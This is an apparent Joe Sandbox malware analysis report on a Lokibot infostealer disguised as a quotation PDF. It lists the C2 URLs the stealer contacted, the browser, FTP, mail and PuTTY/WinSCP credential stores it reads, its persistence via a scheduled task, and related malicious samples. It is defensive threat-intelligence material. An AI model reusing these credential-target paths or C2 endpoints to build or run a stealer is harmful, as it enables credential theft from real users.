Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Queries volume information: C:\Users\user\AppData\Roaming\bCirqu.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation_Order_Request_pdf.bat.exe PID: 7072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bCirqu.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: PopPassword		8_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: SmtpPassword		8_2_0040D069

Source: Yara match	File source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	211 Process Injection	11 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	211 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quotation_Order_Request_pdf.bat.exe	31%	Virustotal		Browse
Quotation_Order_Request_pdf.bat.exe	26%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\bCirqu.exe	26%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://touxzw.ir/sccc/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
touxzw.ir	104.21.112.1	true	false		high
ax-0001.ax-msedge.net	150.171.28.10	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://touxzw.ir/sccc/five/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.apache.org/licenses/LICENSE-2.0	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designersG	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.ibsensoftware.com/	RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bCirqu.exe, 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp, bCirqu.exe, 00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.tiro.com	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	Quotation_Order_Request_pdf.bat.exe, bCirqu.exe.0.dr	false	high
http://www.carterandcone.coml	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.typography.netD	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/cThe	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sandoll.co.kr	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1770983608.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, bCirqu.exe, 00000009.00000002.1995668525.0000000002418000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.112.1	touxzw.ir	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1628799
Start date and time:	2025-03-04 05:51:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Quotation_Order_Request_pdf.bat.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/20@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 405 Number of non-executed functions: 15
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.69.146.102, 23.199.214.10, 4.175.87.197, 40.126.31.128, 20.223.36.55, 13.107.246.60, 2.19.122.26, 20.199.58.43, 20.103.156.88, 150.171.28.10
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, onedsblobvmssprdcus04.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:52:14	Task Scheduler	Run new task: bCirqu path: C:\Users\user\AppData\Roaming\bCirqu.exe
23:52:08	API Interceptor	1x Sleep call for process: Quotation_Order_Request_pdf.bat.exe modified
23:52:13	API Interceptor	35x Sleep call for process: powershell.exe modified
23:52:17	API Interceptor	1x Sleep call for process: bCirqu.exe modified
23:52:18	API Interceptor	60x Sleep call for process: RegSvcs.exe modified
23:52:36	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	CACUuGJw8e.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	loveme123ru.ru/PipeAuthmultiwordpress.php
	Udeladelsers21.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.tumbetgirislinki.fit/7tw6/
	http://onedrivesharedfiles.sbs/	Get hash	malicious	DarkCloud	Browse	onedrivesharedfiles.sbs/
	PAYMENT SWIFT COPY.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/6m32/
	scan_0219025_pdf.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	gH68ux6XtG.exe	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	PO from tpc Type 34.1 34,2 35 Spec 1.js	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	SHIPMENT OF THE ORIGINAL DOCUMENTS.exe	Get hash	malicious	FormBook	Browse	www.sv3880.vip/zhdz/
	LLLLLLLLASSSEERRRR.ps1	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	laserl.ps1	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/?iLy=Wfpx&y2IHp=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe6OYJ2CZYvza1X4jE5qPwznFDfci4lg==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
touxzw.ir	PRI_VTK250419A.exe	Get hash	malicious	Lokibot	Browse	104.21.32.1
	Payment.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	ujXpculHYDYhc6i.exe	Get hash	malicious	Lokibot	Browse	104.21.16.1
	PRI_VTK250419A.exe	Get hash	malicious	Lokibot	Browse	104.21.80.1
	7RryusxiMtHBz80.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	PO.exe	Get hash	malicious	Lokibot	Browse	104.21.96.1
	OEoRzjI7JgSiUUd.exe	Get hash	malicious	Lokibot	Browse	104.21.96.1
	Shipment Delivery No DE0093002-PDF.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	Remittance_CT022024.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	dfiCWCanbj.exe	Get hash	malicious	Lokibot	Browse	104.21.80.1
ax-0001.ax-msedge.net	ORpKB9Agxe.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	150.171.28.10
	AWB#5305323204643.exe	Get hash	malicious	VIP Keylogger	Browse	150.171.28.10
	New order BPD-003666.exe	Get hash	malicious	FormBook	Browse	150.171.28.10
	NT2EkjYJbi.exe	Get hash	malicious	DCRat	Browse	150.171.28.10
	CL2rKEt3gl.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	150.171.28.10
	SecuriteInfo.com.Win32.PWSX-gen.10368.23675.exe	Get hash	malicious	Snake Keylogger	Browse	150.171.28.10
	V5m66K9Jr5.exe	Get hash	malicious	Akira	Browse	150.171.27.10
	hF8f6wMgRx.doc	Get hash	malicious	Unknown	Browse	150.171.28.10
	https://whbsales.crabappleroofings.com/	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://ipfs.io/ipfs/bafybeicedcho2skdcvnx3b7hrj7umido33buufiek43t3ko5zsfojgnezq/Access%20documents.html	Get hash	malicious	Unknown	Browse	150.171.27.10

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PO-#20-09897982025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	run2.exe	Get hash	malicious	Babadeda	Browse	172.67.191.150
	invoice no PS5316.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	wallx.exe	Get hash	malicious	Unknown	Browse	172.67.191.150
	run2.exe	Get hash	malicious	Babadeda	Browse	172.67.191.150
	Google Chrome.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	wallx.exe	Get hash	malicious	Unknown	Browse	104.21.81.221
	#U25baVoicema0291281888915502920003.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	zermpsl.elf	Get hash	malicious	Unknown	Browse	1.2.3.4
	#U25baVoicema0291281888915502920003.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bCirqu.exe_55e4b8d467f93888e659593fd52e85967a9f4_23a869ac_8d3a3b2c-ecdd-42ec-b216-33e253e49864\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2612383142048305
Encrypted:	false
SSDEEP:	192:qAcKcuCA0BU/yaGs+f1ZruMCjKzuiFqZ24IO8k:IKdOBU/yaPMgKzuiFqY4IO8k
MD5:	4FB1B4619DAFD181644A763CEA69017F
SHA1:	8ABB37ACFE38AF419C13812729DB2CCFEC0D1F33
SHA-256:	02B495B8E1780BA630DDCC5CF70BF1BE14C73B27A2F014AF43774137F8E43894
SHA-512:	B60204DD2AE5D887FB77934367F228E99FB2AEC4C41474DE6FCFFBE7F6253BDA5C33AF7A17BB8E2EED081FD7E5CFD6C3472358456A9169C4D38F47B1DC152FB7
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.5.5.3.7.5.4.2.6.0.3.7.2.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.5.5.3.7.5.4.4.1.1.9.3.4.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.3.a.3.b.2.c.-.e.c.d.d.-.4.2.e.c.-.b.2.1.6.-.3.3.e.2.5.3.e.4.9.8.6.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.e.6.f.e.2.7.-.c.3.5.3.-.4.c.6.3.-.8.e.5.4.-.b.e.b.e.b.e.3.0.7.9.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.C.i.r.q.u...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.r.O.W...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.5.8.-.0.0.0.1.-.0.0.1.4.-.4.d.9.c.-.7.b.3.2.c.1.8.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.d.0.a.7.f.a.a.d.e.4.9.0.6.8.f.1.e.7.b.8.9.2.6.1.5.e.1.3.1.8.0.0.0.0.0.0.0.0.!.0.0.0.0.c.3.d.3.a.e.f.e.7.d.d.2.4.4.9.7.1.8.a.2.0.0.c.8.1.9.2.0.9.e.e.2.4.5.4.f.9.6.5.4.!.b.C.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EB9.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Mar 4 04:52:23 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	388161
Entropy (8bit):	3.8607531005768077
Encrypted:	false
SSDEEP:	3072:TH/If308AnAOySuCTakT4uEqY3IOS5BLTg902r6+gyCxmXH3q2qk0k76ktpi:THgKAOySDNT4XINTgNryyhX3q2Z0kzp
MD5:	9F37CEA04921FEF15E91867119985E21
